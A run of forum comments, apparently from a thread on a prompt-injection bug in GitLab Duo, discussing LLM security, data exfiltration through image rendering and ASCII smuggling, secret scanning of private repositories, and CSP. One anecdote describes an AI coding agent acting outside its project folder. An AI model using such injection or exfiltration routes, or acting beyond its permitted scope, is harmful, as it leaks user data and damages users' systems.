That's not to say that they are employees or perform at that level, they don't, but it's to say that LLM behaviours are fuzzy and ill-defined, like humans. You can't guarantee that your users won't click on a phishing email – you can train them, you can minimise risk, but ultimately you have to have a range of solutions applied together and some amount of trust. If we think about LLMs this way I think the conversation around security will be much more productive.
Why? Output isn't deterministic.
The policy was "we'll do it if the customer asks for it, but we don't recommend it, because the success rate is 100%".
TIL
i think i saw it do it or try it and my computer shut down and restarted (mac)
maybe it just deleted the project lol
these llms are really bad at keeping track of the real world, so they might think they're on the project folder but had just navigated back with cd to the user ~ root and so shit happens.
Honestly one should run only these on controlled env's like VM's or Docker.
but YOLO amirite
Part of this is the tool's fault. Anything like that should be done in a chroot.
Anything less is basically "twitch plays terminal" on your machine.
I haven't had a cursor install nuke itself yet, but I have had one fiddling in a parent folder it shouldn't have been able to with workspace protection on..
Yeah Claude 4 can go too far some times
The method they presented, if implemented correctly, apparently can effectively stop most prompt injection vectors
But the reality is I'm very well compensated to summon CRUD slop out of thin air. It's well tested though.
I wish good luck to those who steal my code.
I absolutely am not implying you are one of them, merely that the risk is not the same for all slop crud apps universally
Antoher interesting fact is that most big vendors pay for gh to scan for leaked secrets and auto-revoke them if a public repo contains any (regex string matches sk-xxx <- its a stripe key
thats one of the reasons why vendors use unique greppable starts of api keys with their ID.name on it
And I'm pretty certain that private repos are exempt from the platform's built-in secret scanners because they, too, erroneously think no one can read them without an invitation. Turns out Duo was apparently just silently invited to every repo : - \
good point the scanner doesnt work on private repos =(
Data leakage via untrusted third party servers (especially via image rendering) is one of the most common AI Appsec issues and it's concerning that big vendors do not catch these before shipping.
I built the ASCII Smuggler mentioned in the post and documented the image exfiltration vector on my blog as well in past with 10+ findings across vendors.
GitHub Copilot Chat had a very similar bug last year.
Reminds me of "Tachy0n: The Last 0day Jailbreak" from yesterday: https://blog.siguza.net/tachy0n/
TLDR is: Security issue found, patched in a OS release, Apple seemingly doesn't do regression-testing so security researcher did, found that somehow the bug got unpatched in later OS releases.
https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CSP
The first directive, default-src, tells the browser to load only resources that are same-origin with the document, unless other more specific directives set a different policy for other resource types.
The second, img-src, tells the browser to load images that are same-origin or that are served from example.com.
But that wouldn't stop the AI from writing dangerous instructions in plain text to the humanDoes that mean the minute there is a vulnerability on another gitlab.com url (like an open redirect) this vulnerability is back on the table?
I mean most coder is bad at security and we feed that into LLM so not surprise
You also can’t just fix it by saying “make it secure plz”.
If you don’t know enough to identify a security issue yourself you don’t know enough to know if the LLM caught them all.